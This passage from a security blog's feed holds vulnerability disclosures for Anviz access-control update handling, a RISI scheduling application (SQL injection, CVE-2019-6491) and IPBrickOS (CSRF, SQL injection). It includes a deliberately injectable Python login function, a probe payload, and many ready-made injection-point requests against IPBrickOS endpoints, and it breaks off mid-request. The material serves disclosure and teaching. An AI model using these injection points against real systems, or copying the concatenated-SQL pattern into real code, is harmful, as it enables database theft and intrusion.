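                  "sha256": hashlib.sha256(GOOD_EXE).hexdigest()}],
}
GOOD_MAC = sign_manifest(GOOD_MANIFEST)


def legit_update():
    return verify_update(INSTALLED, GOOD_MANIFEST, GOOD_MAC,
                         {"CrossChex.exe": GOOD_EXE})


def evilgrade_swapped_binary():
    """Attacker replays the genuine manifest but serves their own binary."""
    return verify_update(INSTALLED, GOOD_MANIFEST, GOOD_MAC,
                         {"CrossChex.exe": EVIL_EXE})


def evilgrade_forged_manifest():
    """Attacker bumps the version and pins their file; the MAC cannot match."""
    forged = {"NewVersion": "9.9.9.9",
              "FileList": [{"name": "CrossChex.exe",
                            "sha256": hashlib.sha256(EVIL_EXE).hexdigest()}]}
    return verify_update(INSTALLED, forged, GOOD_MAC, {"CrossChex.exe": EVIL_EXE})


def replayed_downgrade():
    """A genuine but old manifest replayed to a host already on that version."""
    return verify_update("5.3.1.1", GOOD_MANIFEST, GOOD_MAC,
                         {"CrossChex.exe": GOOD_EXE})


def rejected(fn):
    """True when fn() raises ValueError, i.e. the update was refused."""
    try:
        fn()
    except ValueError:
        return True
    return False
```

&lt;p&gt;Note what the hosts-file redirect buys the attacker against this version of the logic: nothing. A forged manifest fails the authentication check, a genuine manifest paired with a swapped binary fails the digest check, and a replayed manifest fails the version check. Transport security (HTTPS with certificate validation) is still worth adding, but these checks are what make the install safe even when the transport is not.&lt;/p&gt;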

&lt;h2 id=&quot;disclosure&quot;&gt;Disclosure&lt;/h2&gt;

&lt;p&gt;With every piece of research there is a time to wrap everything up and do the due diligence: pack everything up, disclose, and alert every vulnerable entity about the problem. The main goal here is not to hurt the company that made the product; it is to raise awareness of the issue and better secure all networks.&lt;/p&gt;

&lt;p&gt;Yes, we could avoid a lot of pain and stress by not divulging our findings, but that would only create havoc when people tried to exploit this in the wild.&lt;/p&gt;

&lt;p&gt;Ok, the first time we tried to contact the vendor it did not go well. We were ignored and got stuck immediately. We didn’t want to release a 0-day and have stores, hospitals, companies and airports that use this technology broken into. So we contacted CNCS (Centro Nacional de Cibersegurança), a Portuguese governmental entity similar to a CSIRT, which offered to aid us. With great effort from them, we built an “attack map”, gathered with the help of online scanners such as Shodan. We passed this information to CNCS so they could contact the corresponding ISPs to identify the exposed companies. Due to local regulations, we couldn’t contact residential IPs. This means that a company that didn’t register itself as a business (business tariffs at ISPs are often higher than residential ones) could not be reached. The others were contacted to remove the exposure from the Internet before we released the tools and research.&lt;/p&gt;

&lt;p&gt;During this information gathering we discovered a great number of exposed devices. We started asking why. Why are so many BIG companies exposing such devices? The answer lies in the documentation itself; as we should have noticed by now, RTFM is a great help here. It turns out the vendor recommends exposing the device for inter-site connectivity! Just set up a port forward and you are done. No site-to-site tunnel, no firewall rules, just expose it, since it’s all secure, right? Around this time another researcher disclosed vulnerabilities similar to ours. This is great for us, since it proves that our results can be &lt;a href=&quot;https://github.com/wizlab-it/anviz-m3-rfid-cve-2019-11523-poc&quot;&gt;replicated&lt;/a&gt;!&lt;/p&gt;

&lt;p&gt;Since there was no response to almost four attempts, and since we got the all-clear from CNCS, we decided to publish the results. Meanwhile, the vendor published an article stating that their new version is GDPR compliant and such, but ignored us anyway. Since we did not send technical details about the vulnerabilities, we don’t know what fixes were made.&lt;/p&gt;

&lt;p&gt;Again, this research is released to the public; use it wisely, don’t harm other people and be conscious of every command you type!&lt;/p&gt;

&lt;p&gt;Edit (04/04/2021 Added CVE entry for evilgrade CVE-2020-19594)&lt;/p&gt;

&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;/h2&gt;

&lt;p&gt;This product is essentially flawed. On top of the bad architecture and design of the product comes the company’s posture regarding security: they never contacted us back during the whole time we reported the issues, and even ignored the CSIRT’s contacts. There are mitigations. The first is to place all these devices on a segmented network without Internet access. Of course we lose some functionality, but that is the cost of having a “defective” device on the network.&lt;/p&gt;

&lt;p&gt;Regarding our own experience, it was awesome combining so many techniques to defeat the system, from reverse engineering network protocols to exploiting a buffer overflow and DNS poisoning. And obviously, the great contribution is to alert the community that even though a product is sold as a security product, it should get a security review to ensure it cannot jeopardize the security of the enterprise. One of the greatest interactions was the study we made to understand how many people were vulnerable, and warning them before releasing this research, since the vendor refused to answer our emails and warn their customers.&lt;/p&gt;

&lt;p&gt;From this disclosure we are building a tool to help others research these issues in the future and to take the exploitation even further (in case someone is interested ;) ): &lt;a href=&quot;https://github.com/psrodrigues/anvizpwn&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;

</description>
        <pubDate>Thu, 28 Nov 2019 00:01:00 +0000</pubDate>
        <link>http://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html</link>
        <guid isPermaLink="true">http://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html</guid>
        
        
        <category>multiple</category>
        
        <category>reverse</category>
        
      </item>
    
      <item>
        <title>SQL injection in RISI - Gestão de Horários (CVE-2019-6491)</title>
<description>&lt;p&gt;RISI Expert Software Solutions, more specifically their Gestão de Horário (Schedule Management) product, suffers from a SQL injection in the login form.&lt;/p&gt;

&lt;p&gt;Since this is mainly Human Resources management software, by abusing this vulnerability it is possible to enumerate the database and retrieve sensitive information. Since the application also supports LDAP connectivity to a domain, it is possible to obtain information about that connection and possibly escalate privileges on the domain if the authentication is badly configured.&lt;/p&gt;

&lt;p&gt;This vulnerability has been identified by MITRE as CVE-2019-6491.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scope of the problem&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;According to RISI’s own website, this software is used in several Portuguese hospitals.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/risi/portfolio.png&quot; alt=&quot;RISI Portfolio&quot; /&gt;&lt;/p&gt;

&lt;p&gt;A quick Google search shows that the National Institute for Medical Emergency (INEM - Instituto Nacional de Emergência Médica) itself is also served by this software and that it belongs to a network domain.&lt;/p&gt;

&lt;p&gt;This could have severe consequences for those who rely on the safety of their fleet as well as the people who work for INEM.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Problem&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Analyzing the interface we see that there are two ways to log in: using domain credentials, or using a “Normal” authentication that checks the user against the underlying database.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/risi/auth.png&quot; alt=&quot;RISI Gestão Horário Login Form&quot; /&gt;&lt;/p&gt;

&lt;p&gt;This normal authentication requires an identification number. If we try to type any character other than a digit, the application blocks it.&lt;/p&gt;

&lt;p&gt;Analyzing the code we can see that a JavaScript CheckNumeric event handler is attached to the keyboard, and if the check fails the character is not appended to the string.&lt;/p&gt;

&lt;p&gt;However, we can remove or replace this handler, or simply edit the request, to insert whatever is necessary to exploit the system.&lt;/p&gt;

&lt;p&gt;By appending the &lt;em&gt;'"qwerty&lt;/em&gt; payload we get an error message regarding the SQL query. This is a good indicator of SQL injection. Due to the severity of the issue, the corresponding CSIRT was contacted to handle it.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;http://www.0x90.zone/images/risi/sqli.png&quot; alt=&quot;RISI Portfolio&quot; /&gt;&lt;/p&gt;

&lt;p&gt;A third party, who wishes to remain anonymous, confirmed that there was indeed a SQL injection vulnerability that could be leveraged. This would allow an attacker to access the database and all its data.&lt;/p&gt;

&lt;p&gt;The txtUser parameter was found to be injectable both via UNION SELECT (four columns, NULL-padded) and via inline queries.&lt;/p&gt;

&lt;p&gt;The “Normal” authentication must be enabled for this vector to be exploitable!&lt;/p&gt;

&lt;p&gt;The vulnerability was detected in RISI - Gestão de Horário version 3201.09.08 rev.23.
Although fixed, the vendor did not update the version number, so a manual check should be made to confirm whether an installation is still vulnerable.&lt;/p&gt;

&lt;p&gt;The User ID is now validated both in the event handler and on the server side, through an int cast of the value.&lt;/p&gt;
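&lt;p&gt;The root cause and the fix are worth seeing side by side: a client-side keypress filter that the server relied on, against server-side validation plus a bound parameter. The Python below is an added example, not RISI code; the real application’s backend and query are not shown on the page, so the SQLite schema (four columns, matching the four-column UNION noted above), the PIN column and the sample rows are all constructed for illustration. The payloads are the probe from the post and the two classic follow-ups it enables.&lt;/p&gt;

```python
"""Vulnerable versus hardened login lookup, added as an example for this post.

Not RISI code: the schema, rows and SQLite backend are constructed so the
injection class described above can be exercised offline.
"""
import sqlite3

# Constructed users table; four columns so a four-column UNION lines up.
USERS = [(1001, "alice", "admin", "4321"), (1002, "bob", "user", "8765")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT, pin TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return con


def vulnerable_rows(txt_user, pin):
    """Reproduces the flaw: the only thing keeping txtUser numeric was a
    client-side keypress handler, and the raw value is spliced into SQL."""
    sql = ("SELECT id, name, role, pin FROM users WHERE id = " + txt_user
           + " AND pin = '" + pin + "'")
    return make_db().execute(sql).fetchall()


def login_vulnerable(txt_user, pin):
    rows = vulnerable_rows(txt_user, pin)
    return rows[0] if rows else None


def error_probe(payload):
    """True when the payload makes the statement fail to parse.  The SQL
    error the post observed after appending '"qwerty is exactly this signal."""
    try:
        vulnerable_rows(payload, "x")
    except sqlite3.OperationalError:
        return True
    return False


def login_hardened(txt_user, pin):
    """Server-side check (the vendor's fix was an int cast) plus a bound
    parameter, so even a numeric-looking payload cannot alter the statement."""
    if not txt_user.isdigit():
        raise ValueError("user id must be numeric")
    return make_db().execute(
        "SELECT id, name, role FROM users WHERE id = ? AND pin = ?",
        (int(txt_user), pin)).fetchone()


def hardened_rejects(txt_user):
    """True when the hardened path refuses the user id outright."""
    try:
        login_hardened(txt_user, "x")
    except ValueError:
        return True
    return False
```

&lt;p&gt;The int cast alone closes the hole for this integer parameter; the bound parameter is there because the same query will sooner or later grow a string column, and the habit of never concatenating input into SQL is what keeps the next field from becoming the next CVE.&lt;/p&gt;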

&lt;p&gt;&lt;strong&gt;Concluding&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This vulnerability was considered critical and dealt with accordingly, with the help of the National CSIRT of Portugal.&lt;/p&gt;

&lt;p&gt;The vendor was quick to patch the exposed, vulnerable systems and update the internal services accordingly.&lt;/p&gt;

&lt;p&gt;From an outside standpoint, although the risk was there, it seems that no IOC was detected.&lt;/p&gt;

&lt;p&gt;This vulnerability was discovered with the help of Professor João Neves. (Thank you)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Timeline&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;18/01/2019 - First contact to request security contact and incident handling&lt;/li&gt;
  &lt;li&gt;19/01/2019 - CVE ID allocated&lt;/li&gt;
  &lt;li&gt;28/01/2019 - Vendor confirmed Fix&lt;/li&gt;
  &lt;li&gt;01/02/2019 - Disclose&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;References&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.owasp.org/index.php/SQL_Injection&quot;&gt;OWASP-SQL injection&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet&quot;&gt;OWASP-SQL injection Mitigation&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I do not promote the exploitation of this vulnerability for malicious purposes. My research was only an academic one without interference or harm to any people.&lt;/p&gt;
</description>
        <pubDate>Fri, 01 Feb 2019 00:02:00 +0000</pubDate>
        <link>http://www.0x90.zone/web/sqli/2019/02/01/risi-gestaohorario.html</link>
        <guid isPermaLink="true">http://www.0x90.zone/web/sqli/2019/02/01/risi-gestaohorario.html</guid>
        
        
        <category>web</category>
        
        <category>SQLi</category>
        
      </item>
    
      <item>
        <title>Multiple Vulnerabilties in IPBrickOS (CVE-2018-16136) (CVE-2018-16137) (CVE-2018-16138)</title>
<description>&lt;p&gt;In today’s post we will look into an operating system designed as an all-in-one solution for managing enterprise computer networks. It acts as a firewall, VoIP PBX, web server, file server and so on.&lt;/p&gt;

&lt;p&gt;Although the “OS” (IPBrickOS) uses open source libraries and tools, they are poorly implemented. Since the company provides a trial for testing the system, I decided to install it, configure it like any other and try it out to look for anything sketchy.&lt;/p&gt;

&lt;p&gt;It wasn’t long before I found situations that are not common in a security application, let alone a firewall.&lt;/p&gt;

&lt;p&gt;Let’s start at the beginning. The IPBrickOS administrator interface has a vulnerability called &lt;a href=&quot;https://www.owasp.org/index.php/Session_fixation&quot;&gt;Session Fixation&lt;/a&gt;. It causes the reuse of a session that should no longer be active. In simple terms: on the login page there is a method that counts down the time until the session expires. After the time expires the session should be destroyed, and a new session ID should be issued on the next request.
However, if we make a request with the same session ID, it is accepted, and the login is “regenerated” into it.&lt;/p&gt;

&lt;p&gt;This is dangerous: if, for some reason, an attacker obtains a session cookie that has expired and the administrator logs in again using the same cookie, the authentication is bypassed.&lt;/p&gt;

&lt;p&gt;Some would say that the attack is a bit far-fetched. But imagine an attacker able to set a cookie and wait for the administrator to log in. He is then able to impersonate the user with that same cookie. The OWASP guide (link above) describes how an attacker may do this.&lt;/p&gt;

&lt;p&gt;Reading on, you will see that this situation is easy to exploit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CVE-2018-16136 Lack of Anti-CSRF tokens in the whole administrative interface&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The administrator interface (IPBrickOS from now on, for short) does NOT enforce CSRF checks. As seen in this &lt;a href=&quot;https://www.0x90.zone/websecurity/2017/12/11/CSRFandCOORS.html&quot;&gt;post&lt;/a&gt;, this vulnerability may lead to the unknowing submission of unwanted forms, for example creating a new administrator with access to the interface. And for the reader who thinks that POST forms aren’t vulnerable, please read &lt;a href=&quot;https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)&quot;&gt;this&lt;/a&gt; carefully!&lt;/p&gt;

&lt;p&gt;Every single form of this application is vulnerable. Yes, the administrator needs to be logged in; still, this is not a vulnerability that should be present in a security appliance.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CVE-2018-16137 SQL injection&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This vulnerability is concerning. This security “solution” hardly validates any form input, in part because they assume an authenticated user will not exploit the system to get at the database. The “solution” obfuscates its PHP code with &lt;a href=&quot;http://www.zend.com/en/products/zend-guard&quot;&gt;Zend Guard&lt;/a&gt;, so reading the source files is difficult. However, we can extract information from the database: users, passwords, various configurations and so on.&lt;/p&gt;

&lt;p&gt;We have both authenticated and unauthenticated SQL injection, although the unauthenticated ones I found are in a schema that holds no session information. There is, however, an unauthenticated SQL injection in the web proxy logs of the solution, which leaks users and URLs. This can severely impact the security of the enterprise, revealing browsing habits and allowing user enumeration. Other endpoints related to other access logs can be inferred from the URLs of the injection points.&lt;/p&gt;

&lt;p&gt;Unfortunately, the unauthenticated part is segregated from the authenticated part. However, that doesn’t exclude the ability to escalate privileges.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;UnAuthenticated&lt;/strong&gt;&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/ajax/generateXMLStats_proxy.php
dateStart=2018-03-14&amp;amp;dateEnd=2018-03-14&amp;amp;periodo=1&amp;amp;musername=1&amp;amp;msourceip=1&amp;amp;mtimestamp=1&amp;amp;msize=1&amp;amp;mcode=1&amp;amp;murl=1&amp;amp;fusername=*&amp;amp;fsourceip=&amp;amp;furl=&amp;amp;offset=0&amp;amp;limit=100&amp;amp;orderby=0&amp;amp;orderby2=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/ajax/generateXMLStats_proxy.php
dateStart=2018-03-14&amp;amp;dateEnd=2018-03-14&amp;amp;periodo=1&amp;amp;musername=1&amp;amp;msourceip=1&amp;amp;mtimestamp=1&amp;amp;msize=1&amp;amp;mcode=1&amp;amp;murl=1&amp;amp;fusername=&amp;amp;fsourceip=&amp;amp;furl=*&amp;amp;offset=0&amp;amp;limit=100&amp;amp;orderby=0&amp;amp;orderby2=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/ajax/generateXMLStats_proxy.php
dateStart=2018-03-14&amp;amp;dateEnd=2018-03-14&amp;amp;periodo=1&amp;amp;musername=1&amp;amp;msourceip=1&amp;amp;mtimestamp=1&amp;amp;msize=1&amp;amp;mcode=1&amp;amp;murl=1&amp;amp;fusername=&amp;amp;fsourceip=*&amp;amp;furl=&amp;amp;offset=0&amp;amp;limit=100&amp;amp;orderby=0&amp;amp;orderby2=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/ajax/generateXMLStats_proxy.php
dateStart=2018-03-14*&amp;amp;dateEnd=2018-03-14&amp;amp;periodo=1&amp;amp;musername=1&amp;amp;msourceip=1&amp;amp;mtimestamp=1&amp;amp;msize=1&amp;amp;mcode=1&amp;amp;murl=1&amp;amp;fusername=&amp;amp;fsourceip=&amp;amp;furl=&amp;amp;offset=0&amp;amp;limit=100&amp;amp;orderby=0&amp;amp;orderby2=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/ajax/generateXMLStats_proxy.php
dateStart=2018-03-14&amp;amp;dateEnd=2018-03-14*&amp;amp;periodo=1&amp;amp;musername=1&amp;amp;msourceip=1&amp;amp;mtimestamp=1&amp;amp;msize=1&amp;amp;mcode=1&amp;amp;murl=1&amp;amp;fusername=&amp;amp;fsourceip=&amp;amp;furl=&amp;amp;offset=0&amp;amp;limit=100&amp;amp;orderby=0&amp;amp;orderby2=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ssl.php
dateStart=2018-03-16*&amp;amp;dateEnd=2018-03-16&amp;amp;periodo=1&amp;amp;offset=0&amp;amp;limit=100&amp;amp;orderby=1&amp;amp;orderby2=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ssl.php
dateStart=2018-03-16&amp;amp;dateEnd=2018-03-16*&amp;amp;periodo=1&amp;amp;offset=0&amp;amp;limit=100&amp;amp;orderby=1&amp;amp;orderby2=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ppp.php
dateStart=2018-03-16*&amp;amp;dateEnd=2018-03-16&amp;amp;periodo=1&amp;amp;offset=0&amp;amp;limit=100&amp;amp;orderby=1&amp;amp;orderby2=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ppp.php
dateStart=2018-03-16&amp;amp;dateEnd=2018-03-16*&amp;amp;periodo=1&amp;amp;offset=0&amp;amp;limit=100&amp;amp;orderby=1&amp;amp;orderby2=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ftp.php
dateStart=2018-03-16*&amp;amp;dateEnd=2018-03-16&amp;amp;periodo=1&amp;amp;offset=0&amp;amp;limit=100&amp;amp;orderby=1&amp;amp;orderby2=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/ajax/generateXMLAccesses_ftp.php
dateStart=2018-03-16&amp;amp;dateEnd=2018-03-16*&amp;amp;periodo=1&amp;amp;offset=0&amp;amp;limit=100&amp;amp;orderby=1&amp;amp;orderby2=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Authenticated&lt;/strong&gt;&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET
https://ipbrick.domain.com/corpo.php?pagina=utilizador_alterar&amp;amp;f_utilizador=*
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET
https://ipbrick.domain.com/corpo.php?pagina=voip_placas_pstn_inserir&amp;amp;tipoplaca=297373351*
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET
https://ipbrick.domain.com/corpo.php?pagina=export_access_pdf&amp;amp;dateStart=2018-03-16&amp;amp;dateEnd=2018-03-16&amp;amp;periodo=1&amp;amp;a_ppp=ppp*&amp;amp;offset=0&amp;amp;limit=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GET
https://ipbrick.domain.com/corpo.php?pagina=export_access_pdf&amp;amp;dateStart=2018-03-16&amp;amp;dateEnd=2018-03-16&amp;amp;periodo=1&amp;amp;a_ssl=ssl*&amp;amp;offset=0&amp;amp;limit=0
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;tb_plugin_show_company_logo\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_hide_never\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_recur_one_year_max\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_state\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_resource_users\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;resources_executing_interval\&quot;\x0d\x0a\x0d\x0a2\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;lastrmt\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_name[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_doAction[1]\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;event_type_action[1]\&quot;\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;show_alt_emails\&quot;\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;horde_signature\&quot;\x0d\x0a\x0d\x0a  \x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
name=\&quot;f_accao\&quot;\x0d\x0a\x0d\x0aModify\x0d\x0a-----------------------------11122813211374287858922608002--\x0d\x0a
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST
https://ipbrick.domain.com/corpo.php
-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;pagina\&quot;\x0d\x0a\x0d\x0awebmail_alterado\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;imap_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;smtp_server\&quot;\x0d\x0a\x0d\x0aipbrick.domain.com\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;db_server\&quot;\x0d\x0a\x0d\x0alocalhost\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;login_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;logo_patch\&quot;; filename=\&quot;\&quot;\x0d\x0aContent-Type: application/octet-stream\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;can_export\&quot;\x0d\x0a\x0d\x0at*\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_users\&quot;\x0d\x0a\x0d\x0a10000\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;admin_prefs\&quot;\x0d\x0a\x0d\x0aadministrator\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; name=\&quot;tb_plugin_calendar_info\&quot;\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------11122813211374287858922608002\x0d\x0aContent-Disposition: form-data; 
